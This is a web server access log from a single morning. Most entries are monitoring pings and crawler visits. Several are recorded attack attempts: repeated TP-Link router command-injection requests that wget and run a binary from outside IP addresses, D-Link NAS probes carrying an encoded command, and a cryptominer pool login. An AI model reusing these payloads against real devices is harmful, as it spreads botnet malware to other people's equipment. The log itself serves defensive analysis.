212.91.246.72 - - [02/May/2024:07:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:02:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:03:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.146.29 - - [02/May/2024:07:04:15 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/May/2024:07:04:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:05:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:06:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.46 - - [02/May/2024:07:07:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/May/2024:07:07:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.246.7.62 - - [02/May/2024:07:08:02 +0200] "GET /cgi/conf.bin HTTP/1.1" 404 317 "http://212.91.246.81:80/mainFrame.htm" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
212.91.246.72 - - [02/May/2024:07:08:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:09:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:10:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:11:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.40.117 - - [02/May/2024:07:12:41 +0200] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg\",\"pass\":\"x\"}}" 501 584 "-" "-"
212.91.246.72 - - [02/May/2024:07:12:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [02/May/2024:07:13:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/May/2024:07:13:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:14:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.110.79 - - [02/May/2024:07:14:58 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:01 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:02 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:05 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:06 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:10 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:17 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:21 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:23 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.110.79 - - [02/May/2024:07:15:35 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
185.16.38.111 - - [02/May/2024:07:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:15:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:16:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:17:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:17:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:18:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:18:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [02/May/2024:07:18:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:20:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/May/2024:07:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:26:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [02/May/2024:07:30:08 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [02/May/2024:07:30:10 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
36.72.215.58 - - [02/May/2024:07:30:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [02/May/2024:07:30:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.95.146.29 - - [02/May/2024:07:32:58 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/May/2024:07:33:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:34:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:35:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.41 - - [02/May/2024:07:36:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/May/2024:07:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:38:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.107 - - [02/May/2024:07:39:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Root Slut"
212.91.246.72 - - [02/May/2024:07:39:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.47 - - [02/May/2024:07:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [02/May/2024:07:40:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.47 - - [02/May/2024:07:40:51 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/May/2024:07:40:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.47 - - [02/May/2024:07:40:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/May/2024:07:41:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:42:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:43:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:44:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:45:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:46:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.95.146.29 - - [02/May/2024:07:52:47 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/May/2024:07:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.77.167.184 - - [02/May/2024:07:55:06 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.229 - - [02/May/2024:07:55:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
84.54.51.41 - - [02/May/2024:07:55:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/May/2024:07:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.66 - - [02/May/2024:07:57:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/May/2024:07:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [02/May/2024:07:58:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/May/2024:07:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:07:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.107 - - [02/May/2024:08:00:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Root Slut"
165.227.111.8 - - [02/May/2024:08:00:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [02/May/2024:08:00:48 +0200] "GET /cluster/cluster/ HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.102 Safari/537.36 Vivaldi/2.0.1309.3"
212.91.246.72 - - [02/May/2024:08:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:01:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.142.182.111 - - [02/May/2024:08:03:39 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [02/May/2024:08:03:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:04:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:05:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:06:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:08:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:09:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:10:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.41 - - [02/May/2024:08:11:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/May/2024:08:11:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:12:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [02/May/2024:08:13:32 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [02/May/2024:08:13:33 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [02/May/2024:08:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:14:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.74.255.34 - - [02/May/2024:08:14:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.1.144.107 - - [02/May/2024:08:15:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Root Slut"
212.91.246.72 - - [02/May/2024:08:15:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:16:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:17:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.128.37 - - [02/May/2024:08:18:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/May/2024:08:18:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:19:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.32 - - [02/May/2024:08:20:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/May/2024:08:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:21:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [02/May/2024:08:22:12 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [02/May/2024:08:22:12 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [02/May/2024:08:22:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:23:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:24:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:25:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.133.38.182 - - [02/May/2024:08:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [02/May/2024:08:26:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:27:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.95.146.29 - - [02/May/2024:08:28:43 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/May/2024:08:28:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:29:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:31:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:32:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:33:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:34:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.203.70.245 - - [02/May/2024:08:34:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [02/May/2024:08:35:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.244.27 - - [02/May/2024:08:35:09 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:09 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:22 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:25 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:29 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:32 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:40 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
107.170.244.27 - - [02/May/2024:08:35:59 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
212.91.246.72 - - [02/May/2024:08:36:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.244.27 - - [02/May/2024:08:36:18 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
